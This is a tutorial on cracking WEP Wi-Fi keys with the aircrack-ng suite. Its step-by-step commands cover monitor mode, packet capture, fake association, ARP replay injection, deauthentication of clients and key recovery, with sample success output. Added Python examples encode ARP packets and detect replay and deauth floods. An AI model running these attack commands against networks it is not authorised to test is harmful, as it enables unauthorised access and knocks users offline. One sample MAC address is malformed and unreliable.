Cracking WEP using aircrack on Kali Linux

 



What is WEP?

Wired Equivalent Privacy (WEP) is a weak security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in September 1999, its intention was to provide data confidentiality comparable to that of a traditional wired network. WEP, recognizable by the key of 10 or 26 hexadecimal digits, is widely in use and is often the first security choice presented to users by router configuration tools.
Although its name implies that it is as secure as a wired connection, WEP has been demonstrated to have numerous flaws and has been deprecated in favor of newer standards such as WPA2. In 2003 the Wi-Fi Alliance announced that WEP had been superseded by Wi-Fi Protected Access (WPA). In 2004, with the ratification of the full 802.11i standard (i.e. WPA2), the IEEE declared that both WEP-40 and WEP-104 "have been deprecated as they fail to meet their security goals".

WEP CRACK

The basic concept behind WEP cracking is to use aireplay-ng to replay a captured ARP packet so that the access point generates new, unique IVs. aircrack-ng then uses those unique IVs to recover the WEP key.
What is ARP? ARP (Address Resolution Protocol) is the TCP/IP protocol used to convert an IP address into a physical address, such as an Ethernet address. A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host that owns the IP address in the request then replies with its physical hardware address.
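To make the ARP part concrete, here is an added example (not code from the original post, nor from the aircrack-ng project) that builds and parses the 28-byte ARP packet described above and answers a request the way the owning host does. The MAC and IP addresses are constructed placeholders. The last function shows why ARP matters both for this attack and for anyone watching for it: every ARP field is fixed-size, so an ARP request wrapped in a WEP data frame always has the same on-air length, which is how it can be picked out of encrypted traffic and how a monitor can notice the same frame being replayed.

```python
"""ARP request/reply encoding plus the WEP frame-length arithmetic.
Added example; the addresses used below are constructed placeholders."""
import struct

# Ethernet/IPv4 ARP body: htype, ptype, hlen, plen, opcode,
# sender MAC, sender IP, target MAC, target IP (always 28 bytes)
ARP_FMT = "!HHBBH6s4s6s4s"
ARP_REQUEST, ARP_REPLY = 1, 2
HTYPE_ETHERNET, PTYPE_IPV4 = 1, 0x0800
ZERO_MAC = "00:00:00:00:00:00"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Serialise one ARP packet. A request carries ZERO_MAC as the target
    MAC because the asker does not know it yet."""
    return struct.pack(ARP_FMT, HTYPE_ETHERNET, PTYPE_IPV4, 6, 4, opcode,
                       mac_bytes(sender_mac), ip_bytes(sender_ip),
                       mac_bytes(target_mac), ip_bytes(target_ip))


def parse_arp(pkt: bytes) -> dict:
    """Decode an ARP packet, rejecting anything that is not Ethernet/IPv4."""
    htype, ptype, hlen, plen, opcode, smac, sip, tmac, tip = struct.unpack(ARP_FMT, pkt)
    if (htype, ptype, hlen, plen) != (HTYPE_ETHERNET, PTYPE_IPV4, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    return {"op": opcode, "sender_mac": mac_str(smac), "sender_ip": ip_str(sip),
            "target_mac": mac_str(tmac), "target_ip": ip_str(tip)}


def answer_request(request: bytes, my_mac: str, my_ip: str):
    """The host that owns the requested IP replies with its own MAC;
    every other host stays silent (returns None)."""
    q = parse_arp(request)
    if q["op"] != ARP_REQUEST or q["target_ip"] != my_ip:
        return None
    return build_arp(ARP_REPLY, my_mac, my_ip, q["sender_mac"], q["sender_ip"])


# On-air size of a WEP-encrypted ARP request in a non-QoS data frame:
# 802.11 header + IV/key-id + LLC/SNAP + ARP body + ICV.
DOT11_DATA_HDR, WEP_IV, LLC_SNAP, WEP_ICV = 24, 4, 8, 4


def wep_arp_frame_length() -> int:
    """Constant length of every WEP ARP request, which is what makes such
    frames recognisable without decrypting them."""
    return DOT11_DATA_HDR + WEP_IV + LLC_SNAP + struct.calcsize(ARP_FMT) + WEP_ICV


if __name__ == "__main__":
    asker_mac, asker_ip = "02:00:00:00:00:02", "10.0.0.2"   # constructed
    owner_mac, owner_ip = "02:00:00:00:00:01", "10.0.0.1"   # constructed
    req = build_arp(ARP_REQUEST, asker_mac, asker_ip, ZERO_MAC, owner_ip)
    print("request:", parse_arp(req))
    print("reply:", parse_arp(answer_request(req, owner_mac, owner_ip)))
    print("WEP ARP frame length:", wep_arp_frame_length())
```

Run it directly to see the request, the reply and the 68-byte on-air length; the length is the same for every WEP-protected ARP request, regardless of who sends it, because nothing in the packet is variable-sized.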

Basic Assumptions

You are using drivers patched for injection. Use the injection test to confirm your card can inject before proceeding.
You are physically close enough to send and receive access point packets. Remember that just because you can receive packets from the access point does not mean you will be able to transmit packets to the AP. The wireless card's transmit strength is typically less than the AP's, so you have to be physically close enough for your transmitted packets to reach and be received by the AP. You should confirm that you can communicate with the specific AP before proceeding.
There is at least one wired or wireless client connected to the network and it is active. This tutorial depends on receiving at least one ARP request packet, and if there are no active clients there will never be any ARP request packets.

WEP Hacking Methodology

Step 1 - Start the wireless card in monitor mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is a mode in which your card can listen to every packet in the air. Normally your card will only “hear” packets addressed to you. By hearing every packet, we can later select some for injection. Also, with rare exceptions, only monitor mode allows you to inject packets.


First of all, enter “iwconfig” to ensure you have a wireless interface. The output should look similar to this:
 
lo no wireless extensions.

eth0 no wireless extensions.

wlan0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0



Then to enter into monitor mode:

airmon-ng start wlan0


Step 2 - Check the access points available

Check the available networks with the following command (mon0 is the monitor-mode interface created by airmon-ng in Step 1):

airodump-ng mon0

Note down the following information for the AP to crack WEP:
· BSSID
· Ch
· ENC
· ESSID

Step 3 - Start airodump-ng to capture IVs

The purpose of this step is to capture the IVs generated. This step starts airodump-ng to capture the IVs from the specific access point.

airodump-ng -c <channel> --bssid <bssid> -w <filename> mon0
where
-c is the channel number of the target AP
--bssid restricts the capture to that access point's BSSID
-w is the prefix of the file the captured IVs are written to (airodump-ng appends a counter, giving filename-01.cap)

Step 4 - Fake association with the access point

Open a new console window in the foreground, and enter this command: 

aireplay-ng -1 0 -a (bssid) -h (mac of your card) -e (essid) (interface)
 
Here the ESSID is the access point's SSID name, which in my case is yoyo. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

Step 5 - Replay attack

The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV. Again, this is our objective, to obtain a large number of IVs in a short period of time.
Open another console session and enter:


aireplay-ng -3 -b <bssid> -h <mac address> mon0

where
-3 selects the standard ARP request replay attack
-b is the BSSID of the access point
-h is the source MAC address (the MAC of your card, as used in Step 4)


It will start listening for ARP requests and, when it hears one, aireplay-ng will immediately start to inject it. If your screen still says “got 0 ARP requests” after waiting a long time, no ARP request has been captured yet. You can confirm that you are injecting by checking your airodump-ng screen: the data packet count should be increasing rapidly, and the “#/s” column should be a decent number. What counts as decent depends on a large variety of factors; a typical range is 300 to 400 data packets per second, but it can be as low as 100/second and as high as 500/second.


You may also try to deauthenticate an associated client to speed up the process of capturing an ARP packet, using:

aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0

where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client and mon0 is your wireless NIC in monitor mode.

The command output looks something like:

12:34:56 Waiting for beacon frame (BSSID: 00:11:22:33:44:55:66) on channel 6
12:34:56 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55:66] [ 5:62 ACKs] 
 
Note that the last two numbers in brackets, [ 5:62 ACKs ], show the number of acknowledgements received from the client NIC (first number) and from the AP (second number). It is important to have a number greater than zero in both.
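Seen from the network's side, Step 5 and the deauthentication trick above both leave a loud signature in a monitor-mode capture: one station emitting hundreds of identical-length data frames per second, and dozens of deauthentication frames aimed at one client within a fraction of a second. The following is an added example (not part of the original post or of aircrack-ng) of detection logic for both patterns, run over a constructed set of frame records. The MAC addresses are constructed, the 68-byte frame length is just the value used in the sample, and the thresholds (100 data frames per second with 90% sharing one length; 10 deauth frames per second to one target) are assumptions that a site would tune to its own traffic.

```python
"""Spotting ARP-request replay and deauth floods in a frame capture.
Added example, not part of the original post or of aircrack-ng. The
frame records and MAC addresses are constructed; the thresholds are
assumptions to be tuned per site."""
from collections import Counter, defaultdict

AP = "02:00:00:aa:00:01"        # constructed BSSID
CLIENT = "02:00:00:cc:00:02"    # constructed associated client
INJECTOR = "02:00:00:ee:00:03"  # constructed source MAC used for replay


def build_sample():
    """Constructed capture: (timestamp_s, frame_type, src, dst, length).
    frame_type is 'data' or 'deauth'."""
    frames = []
    # normal client traffic: a few frames per second with mixed sizes
    for i in range(15):
        frames.append((0.2 * i, "data", CLIENT, AP, 100 + (i * 37) % 900))
    # a single legitimate deauth (normal session teardown)
    frames.append((1.5, "deauth", AP, CLIENT, 26))
    # ARP-request replay: 400 identical-length data frames inside one second
    for i in range(400):
        frames.append((3.0 + i / 400, "data", INJECTOR, AP, 68))
    # deauth flood: 64 directed deauth frames at the client within 0.3 s
    for i in range(64):
        frames.append((5.0 + i * 0.3 / 64, "deauth", AP, CLIENT, 26))
    return frames


def detect_arp_replay(frames, min_rate=100, same_length_share=0.9):
    """Alert when one source sends >= min_rate data frames in a second and
    nearly all of them share a single length. Real stations mix frame
    sizes; a replay loop re-sends the same captured frame over and over."""
    by_bucket = defaultdict(list)  # (second, src) -> [length, ...]
    for ts, ftype, src, _dst, length in frames:
        if ftype == "data":
            by_bucket[(int(ts), src)].append(length)
    alerts = []
    for (second, src), sizes in sorted(by_bucket.items()):
        if len(sizes) < min_rate:
            continue
        length, count = Counter(sizes).most_common(1)[0]
        if count / len(sizes) >= same_length_share:
            alerts.append({"second": second, "src": src,
                           "frames": len(sizes), "length": length})
    return alerts


def detect_deauth_flood(frames, threshold=10):
    """Alert on (source, target) pairs with >= threshold deauth frames in
    one second. An AP deauthenticates a client once, not dozens of times."""
    counts = Counter()
    for ts, ftype, src, dst, _length in frames:
        if ftype == "deauth":
            counts[(int(ts), src, dst)] += 1
    return [{"second": s, "src": src, "dst": dst, "frames": n}
            for (s, src, dst), n in sorted(counts.items()) if n >= threshold]


if __name__ == "__main__":
    sample = build_sample()
    for alert in detect_arp_replay(sample):
        print("ARP replay suspected:", alert)
    for alert in detect_deauth_flood(sample):
        print("deauth flood suspected:", alert)
```

On a real capture the tuples would come from a pcap decoder that exposes the 802.11 frame type, addresses and length; the two detectors only need those fields. Bucketing by whole seconds keeps the code short; a sliding window would catch bursts that straddle a second boundary.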

Step 6 - Final command to crack

The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.
Note: for learning purposes, you should use a 64-bit WEP key on your AP to speed up the cracking process. If this is the case, then you can include “-n 64” to limit the checking of keys to 64 bits.
Open another console session and enter:

aircrack-ng -b <bssid> filename-01.cap

where -b restricts the attempt to the target access point's BSSID and filename-01.cap is the capture file airodump-ng wrote in Step 3.

Note: to check that the capture file exists, enter “ls”.

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64-bit and 1,500,000 IVs for 128-bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128-bit keys. These are very approximate figures, and there are many variables affecting how many IVs you actually need to crack the WEP key.
Here is what success looks like: 
 
Aircrack-ng 0.9


[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%

CRACK SUCCESSFUL!!!
Key Found



Now you can use this key to log in to your Wi-Fi network.
 
The article was originally published on 25 Aug 2012.
